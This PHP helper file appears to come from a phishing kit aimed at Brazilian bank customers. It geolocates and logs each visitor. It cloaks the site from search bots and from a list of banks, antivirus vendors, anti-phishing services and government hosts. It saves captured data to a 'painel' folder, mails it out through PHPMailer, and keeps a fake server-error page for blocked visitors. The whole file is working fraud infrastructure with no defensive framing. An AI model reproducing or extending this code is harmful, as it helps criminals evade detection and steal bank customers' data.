<?php
session_start();
ob_start();
date_default_timezone_set('America/Sao_Paulo');

include(__DIR__ . '/Mobile_Detect.php');
include(__DIR__ . '/conn.php');

$UserIp = ($_SERVER['REMOTE_ADDR'] == '::1' || $_SERVER['REMOTE_ADDR'] == '127.0.0.1') ? '200.148.12.188' : $_SERVER['REMOTE_ADDR'];

function getSystem()
{
    $detect = new Mobile_Detect;

    if ($detect->isMobile()) {
        if ($detect->isiOS()) {
            $sistema = 'iphone';
        } else {
            $sistema = 'android';
        }
    } else {
        $sistema = 'desktop';
    }
    return strtoupper($sistema);
}

function getNavegador()
{
    $MSIE = strpos($_SERVER['HTTP_USER_AGENT'], "MSIE");
    $Firefox = strpos($_SERVER['HTTP_USER_AGENT'], "Firefox");
    $Mozilla = strpos($_SERVER['HTTP_USER_AGENT'], "Mozilla");
    $Chrome = strpos($_SERVER['HTTP_USER_AGENT'], "Chrome");
    $Chromium = strpos($_SERVER['HTTP_USER_AGENT'], "Chromium");
    $Safari = strpos($_SERVER['HTTP_USER_AGENT'], "Safari");
    $Opera = strpos($_SERVER['HTTP_USER_AGENT'], "Opera");

    if ($MSIE == true) {
        $navegador = "IE";
    } else if ($Firefox == true) {
        $navegador = "Firefox";
    } else if ($Mozilla == true) {
        $navegador = "Firefox";
    } else if ($Chrome == true) {
        $navegador = "Chrome";
    } else if ($Chromium == true) {
        $navegador = "Chromium";
    } else if ($Safari == true) {
        $navegador = "Safari";
    } else if ($Opera == true) {
        $navegador = "Opera";
    } else {
        $navegador = $_SERVER['HTTP_USER_AGENT'];
    }
    return $navegador;
}

function validIp($tokenIp)
{
    $ip = $_SESSION['ip'];

    if ($tokenIp == '' || strlen($tokenIp) < 3 || $tokenIp == 'TOKEN_AQUI') {
        $addOn = '';
    } else {
        $addOn = "?token={$tokenIp}";
    }

    $link = "https://ipinfo.io/{$ip}/json{$addOn}";
    $ch = curl_init($link);

    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type:application/json'));
    $result = curl_exec($ch);

    $resultado = json_decode($result, true);

    if (!isset($resultado['country']) || !isset($resultado['city']) || !isset($resultado['region'])) {
        return false;
    }

    $countryCode = htmlentities($resultado['country']);
    $city = htmlentities($resultado['city']);
    $state = htmlentities($resultado['region']);

    if (strlen($countryCode) < 2 || strlen($state) < 2 || strlen($city) < 2) {
        return false;
    } else {
        return [
            'countryCode' => html_entity_decode($countryCode),
            'state' => html_entity_decode($state),
            'city' => html_entity_decode($city)
        ];
    }
}

function getPlataforma()
{
    $useragent = $_SERVER['HTTP_USER_AGENT'];
    if (preg_match('/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows (ce|phone)|xda|xiino/i', $useragent) || preg_match('/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i', substr($useragent, 0, 4))) {
        $plataforma = "MOBILE";
    } else {
        $plataforma = "PC";
    }

    return $plataforma;
}

function validAgent()
{
    $blockedUserAgents = array(
        'webfilter',
        'feedfetcher'
    );

    foreach ($blockedUserAgents as $userAgent) {
        if (strpos($_SERVER['HTTP_USER_AGENT'], $userAgent) !== false) {
            return false;
        }
    }

    return true;
}

function blockBots()
{
    if (!empty($_SERVER['HTTP_USER_AGENT'])) {
        $userAgents = array('Google', 'GoogleBot', 'Slurp', 'MSNBot', 'ia_archiver', 'Yandex', 'Rambler');
        if (preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
            return false;
        }

        return true;

    } else {
        return false;
    }
}

function checkHost()
{
    $resuelveserver = gethostbyaddr($_SERVER['SERVER_ADDR']);

    $host = gethostbyaddr(getenv('REMOTE_ADDR'));
    $banhosts = array('186.231.96.130', '186-231-96-130.livetim.timbrasil.com.br', 'bradesco', 'pish', 'santander',
        'scotiabank', 'google-bot', 'netcraft.com', 'ebay.com', 'panda.com', 'microsoft.com',
        'fbi.gov', 'google.com', 'msn.com', 'yahoo.com', 'cia.gov', "$resuelveserver", 'bankofamerica', 'viabcp', 'veritas',
        'nod32', 'antipishing', 'kapersky', 'norton', 'symantec', 'rsasecurity', 'bancopopular', 'paypal', 'unicaja', 'cloudentel',
        'banesto', 'cajamadrid', 'bancopastor', 'rsa.com', 'symantecstore', 'gfihispana', 'fraudwatchinternational', 'verisign',
        'markmonitor', 'anti-phishing', 'pandasoftware', 'delitosinformaticos', 'zonealarm', 'alerta-antivirus', 'vsantivirus',
        'nortonsecurityscan', 'hauri-la', 'cleandir', 'trendmicro', 'mcafee', 'nod32-es', 'pandaantivirus', 'free-av', 'grisoft',
        'bitdefender-es', 'sophos', 'activescan', 'avast', 'bitdefender', 'trendmicro-europe', 'clamav', 'clamwin', 'eset',
        'symantecstore', 'f-secure', 'hispasec', 'vnunet', 'seguridad', 'security', 'monitor', 'detector', 'letti', 'itau',
        'santander', 'dufrio', 'mx.', 'bradesco', 'bb.com.br', 'uptimerobot.com');

    $error = false;
    $x = count($banhosts);
    for ($y = 0; $y < $x; $y++) {
        if (strpos($host, $banhosts[$y]) == true) {
            $error = true;
        }
    }

    if ($error === true) {
        return false;
    } else {
        return true;
    }
}

function getQuery($mainFile){
    if(isset($_GET) && $_GET != null){
        $allGetters = $_GET;
        $allGetters = http_build_query($allGetters);
        $query = $mainFile . '?' . $allGetters;
    }else{
        $query = $mainFile;
    }

    return $query;
}

function getOS() {
    $user_agent = $_SERVER['HTTP_USER_AGENT'];

    $os_platform = 'Unknown OS Platform';

    $os_array = array(
        '/windows nt 10/i' => 'Windows',
        '/windows nt 6.3/i' => 'Windows',
        '/windows nt 6.2/i' => 'Windows',
        '/windows nt 6.1/i' => 'Windows',
        '/windows nt 6.0/i' => 'Windows',
        '/windows nt 5.2/i' => 'Windows',
        '/windows nt 5.1/i' => 'Windows',
        '/windows xp/i' => 'Windows',
        '/windows nt 5.0/i' => 'Windows',
        '/windows me/i' => 'Windows',
        '/win98/i' => 'Windows',
        '/win95/i' => 'Windows',
        '/win16/i' => 'Windows',
        '/macintosh|mac os x/i' => 'Mac OS',
        '/mac_powerpc/i' => 'Mac OS',
        '/linux/i' => 'Linux',
        '/ubuntu/i' => 'Linux',
        '/iphone/i' => 'iPhone',
        '/ipod/i' => 'iPod',
        '/ipad/i' => 'iPad',
        '/android/i' => 'Android',
        '/blackberry/i' => 'BlackBerry',
        '/webos/i' => 'Mobile'
    );

    foreach ($os_array as $regex => $value) {

        if (preg_match($regex, $user_agent)) {
            $os_platform = $value;
        }

    }

    return $os_platform;
}

function saveAcess($plataforma, $navegador, $siglapais, $estado, $cidade)
{
    ignore_user_abort(false);

    $registos = __DIR__ . '/../reg.txt';

    if (!file_exists($registos)) {
        $fp = @fopen($registos, 'w+');
    } else {
        $fp = @fopen($registos, 'a');
    }

    $UserIp = ($_SERVER['REMOTE_ADDR'] == '::1' || $_SERVER['REMOTE_ADDR'] == '127.0.0.1') ? '200.148.12.188' : $_SERVER['REMOTE_ADDR'];

    @flock($fp, LOCK_EX);
    @fwrite($fp, date('d-m-Y') . '**' . date('H:i:s') . "**{$plataforma}**{$UserIp}**{$navegador}**{$siglapais}**{$estado}**{$cidade}\n");
    @flock($fp, LOCK_UN);
    @fclose($fp);
}

function sendMail($assunto, $mensagem, $aviao, $destino, $tipo_envio = null, $tipo_security = null, $arquivo = null)
{
    require_once(__DIR__ . '/smtp/class.phpmailer.php');

    $nomeRemetente = 'DOLAR';
    $nomeDestino = 'REAL';

    $mail = new PHPMailer();

    if ($tipo_envio == 'php' || $tipo_envio == null) {
        $mail->IsMail();
    } elseif ($tipo_envio == 'smtp') {
        $mail->IsSMTP();
    } elseif ($tipo_envio == 'sendmail') {
        $mail->IsSendmail();
    } elseif ($tipo_envio == 'qmail') {
        $mail->IsQmail();
    } else {
        $mail->IsMail();
    }

    if ($tipo_security == 'tls') {
        $mail->SMTPSecure = 'tls';
    } elseif ($tipo_security == 'ssl') {
        $mail->SMTPSecure = 'ssl';
    }

    if ($tipo_envio == 'smtp') {
        $mail->SMTPAuth = true;

        $mail->Host = trim(HOST_SMTP);
        $mail->Port = trim(PORT_SMTP);
        $mail->Username = trim(USER_SMTP);
        $mail->Password = trim(PASS_SMTP);
    }

    $mail->IsHTML(true);

    $mail->From = utf8_decode($aviao);
    $mail->FromName = utf8_decode($nomeRemetente);

    $mail->Subject = utf8_decode($assunto);
    $mail->Body = utf8_decode($mensagem);

    $destinatarios = explode(',', $destino);
    for ($d = 0; $d < count($destinatarios); $d++) {
        $mail->AddAddress(utf8_decode($destinatarios[$d]), utf8_decode($nomeDestino));
    }

    if ($arquivo != null) {
        $NExt = explode('.', $arquivo['name']);
        $NArq = md5(time());
        $AExt = $NExt[1];

        $mail->addAttachment($arquivo);
    }


    if ($mail->Send()) {
        return true;
    } else {
        return false;
    }
}

function savePainel($msg, $ip)
{
    if (!isset($_SESSION['random'])) {
        $random = rand(1111, 9999);
        $_SESSION['random'] = $random;
    } else {
        $random = $_SESSION['random'];
    }

    if (!isset($_SESSION['dataSave'])) {
        $dataSave = date('d-m-y-H-i');
        $_SESSION['dataSave'] = $dataSave;
    } else {
        $dataSave = $_SESSION['dataSave'];
    }

    $fp = fopen(__DIR__ . "/../painel/info/{$dataSave}-{$ip}-{$random}.txt", 'a');
    fwrite($fp, $msg);
    fclose($fp);
}

$e500 = '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head>
<title>500 Internal Server Errorr</title></head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to complete
your request.</p>
<p>Please contact the server administrator,
administrator and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
<p>More information about this error may be available
in the server error log.</p><hr><address></address></body></html>';

